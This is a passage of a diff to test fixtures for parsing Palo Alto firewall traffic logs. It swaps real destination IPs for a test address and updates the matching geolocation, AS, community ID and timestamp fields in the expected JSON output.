"1:5ECmBtgiSUvWFJAA318pVeeu5Pw=" + "1:8WGNPmtmu/zuzAhN183DA9tKQOA=", + "1:/8tg/qp7ijclMeA6CKtchq/HXx8=" ], "transport": "tcp", "application": "ocsp", @@ -11604,14 +11715,14 @@ ], "ip": [ "192.168.15.224", - "23.52.174.25", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942033695Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,23.52.174.25,192.168.1.63,23.52.174.25,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031803200Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -11634,27 +11745,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 315, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -11673,7 +11786,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -11688,7 +11801,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -11710,7 +11823,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:hxrz+dYE5XEf60JMlFz6JKWD6Ek=" + "community_id": "1:+dAjIg3ed8rxAdZqVmInBcFaH1Y=" } }, "sequence_number": 32091182, @@ -11730,8 +11843,8 @@ ], "network": { "community_id": [ - "1:5CL0nRdjk2Nab0PzB6vfyC1FbtI=", - "1:hxrz+dYE5XEf60JMlFz6JKWD6Ek=" + "1:WVlFLy1ZPgggGkD86Ln70kG53+s=", + "1:+dAjIg3ed8rxAdZqVmInBcFaH1Y=" ], "transport": "udp", "application": "dns", @@ -11771,14 +11884,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:40:05.942037191Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031808600Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -11801,27 +11914,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 130, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -11840,7 +11955,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -11855,7 +11970,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -11877,7 +11992,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:8cb9oPS9OJnzqGAkowgmRpiqmJU=" + "community_id": "1:cEWHWAc2Xquu42JBj+eNL8udND0=" } }, "sequence_number": 32091183, @@ -11897,8 +12012,8 @@ ], "network": { "community_id": [ - "1:3cIrQ2yt0QUupDVmbBJXH54+2pA=", - "1:8cb9oPS9OJnzqGAkowgmRpiqmJU=" + "1:DdftFWHUV6zFdIItu/clDOeJp2w=", + "1:cEWHWAc2Xquu42JBj+eNL8udND0=" ], "transport": "udp", "application": "dns", @@ -11938,14 +12053,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942040709Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031814100Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -11968,30 +12083,29 @@ "destination": { "nat": { "port": 443, - "ip": "54.230.5.228" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Washington", + "region_name": "Jilin", "location": { - "lon": -122.3032, - "lat": 47.54 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 288, - "ip": "54.230.5.228", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -12010,7 +12124,7 @@ "packets": 5, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.230.5.228,192.168.1.63,54.230.5.228,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12025,7 +12139,7 @@ "destination": { "nat": { "port": 443, - "ip": "54.230.5.228" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -12047,7 +12161,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:Qc2oBV7ermdHPwGTWFOi4D1TcLg=" + "community_id": "1:8KbQCYJwbYHBvENQZkl3srNU90Q=" } }, "sequence_number": 32091184, @@ -12067,8 +12181,8 @@ ], "network": { "community_id": [ - "1:ArbNq6iF9i1NLk5zDU1qThAZf4g=", - "1:Qc2oBV7ermdHPwGTWFOi4D1TcLg=" + "1:qW5DkhfRjZjDc2LML6UL/ILla3k=", + "1:8KbQCYJwbYHBvENQZkl3srNU90Q=" ], "transport": "tcp", "application": "incomplete", @@ -12108,14 +12222,14 @@ ], "ip": [ "192.168.15.224", - "54.230.5.228", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 12000000000, - "ingested": "2021-09-08T12:40:05.942095Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,54.230.5.228,192.168.1.63,54.230.5.228,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031819500Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -12138,27 +12252,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 149, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -12177,7 +12293,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12192,7 +12308,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -12214,7 +12330,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:5IHTDvzRd4yPLPdpI4ErHcRK4/w=" + "community_id": "1:TP97MYHMqjGEwqLRwc1YYh3ZNh8=" } }, "sequence_number": 32091185, @@ -12234,8 +12350,8 @@ ], "network": { "community_id": [ - "1:uTxp5xDc9k43Sc1xNxNrsxzfM/I=", - "1:5IHTDvzRd4yPLPdpI4ErHcRK4/w=" + "1:cTo0xm7D3/5fRCbdwwuwUxi722g=", + "1:TP97MYHMqjGEwqLRwc1YYh3ZNh8=" ], "transport": "udp", "application": "dns", @@ -12275,14 +12391,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942106210Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031824900Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -12305,27 +12421,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 202, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -12344,7 +12462,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12359,7 +12477,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -12381,7 +12499,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:0s4n+/itsIbV3mUc8OnOxmZ6exs=" + "community_id": "1:G2nWQeko18fm7LG80vVA2C3krF4=" } }, "sequence_number": 32091186, @@ -12401,8 +12519,8 @@ ], "network": { "community_id": [ - "1:hwpLJFJeocCuki/uuS7DMUwYAcc=", - "1:0s4n+/itsIbV3mUc8OnOxmZ6exs=" + "1:HivHFd76C8fGYRMgg2/dN+qo64I=", + "1:G2nWQeko18fm7LG80vVA2C3krF4=" ], "transport": "udp", "application": "dns", @@ -12442,14 +12560,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942110250Z", - "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031830600Z", + "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -12472,27 +12590,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 195, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -12511,7 +12631,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12526,7 +12646,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -12548,7 +12668,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:+GsjKlESn/QeXwrAsS8c8EaMzi0=" + "community_id": "1:skBdPMEq89/IUuq3+XIkE66uttE=" } }, "sequence_number": 32091187, @@ -12568,8 +12688,8 @@ ], "network": { "community_id": [ - "1:PL/uhiXbtv9YRtGDNEfmkWyMpEw=", - "1:+GsjKlESn/QeXwrAsS8c8EaMzi0=" + "1:PwRRWHkgbRmPTd6QdE3JdT1K2MI=", + "1:skBdPMEq89/IUuq3+XIkE66uttE=" ], "transport": "udp", "application": "dns", @@ -12609,14 +12729,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942113911Z", - "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031836Z", + "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -12639,27 +12759,29 @@ "destination": { "nat": { "port": 123, - "ip": "208.83.246.20" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 30303, + "number": 4837, "organization": { - "name": "Ooma, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 123, "bytes": 90, - "ip": "208.83.246.20", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -12678,7 +12800,7 @@ "packets": 1, "ip": "192.168.15.195" }, - "message": "192.168.15.195,208.83.246.20,192.168.1.63,208.83.246.20,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.195,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12693,7 +12815,7 @@ "destination": { "nat": { "port": 123, - "ip": "208.83.246.20" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -12715,7 +12837,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:OSARbLstqz9D5CGo0NQuv0a9g20=" + "community_id": "1:0JBiFALZ5+EqldWjAGvPg9L1/F4=" } }, "sequence_number": 32091188, @@ -12735,8 +12857,8 @@ ], "network": { "community_id": [ - "1:zSTxlbsV3qi7ri6QQifUc6oMz/o=", - "1:OSARbLstqz9D5CGo0NQuv0a9g20=" + "1:r9DVMebzpXyl8Djuzm9yZHSPHpI=", + "1:0JBiFALZ5+EqldWjAGvPg9L1/F4=" ], "transport": "udp", "application": "ntp", @@ -12776,14 +12898,14 @@ ], "ip": [ "192.168.15.195", - "208.83.246.20", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942117589Z", - "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,208.83.246.20,192.168.1.63,208.83.246.20,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031843200Z", + "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United 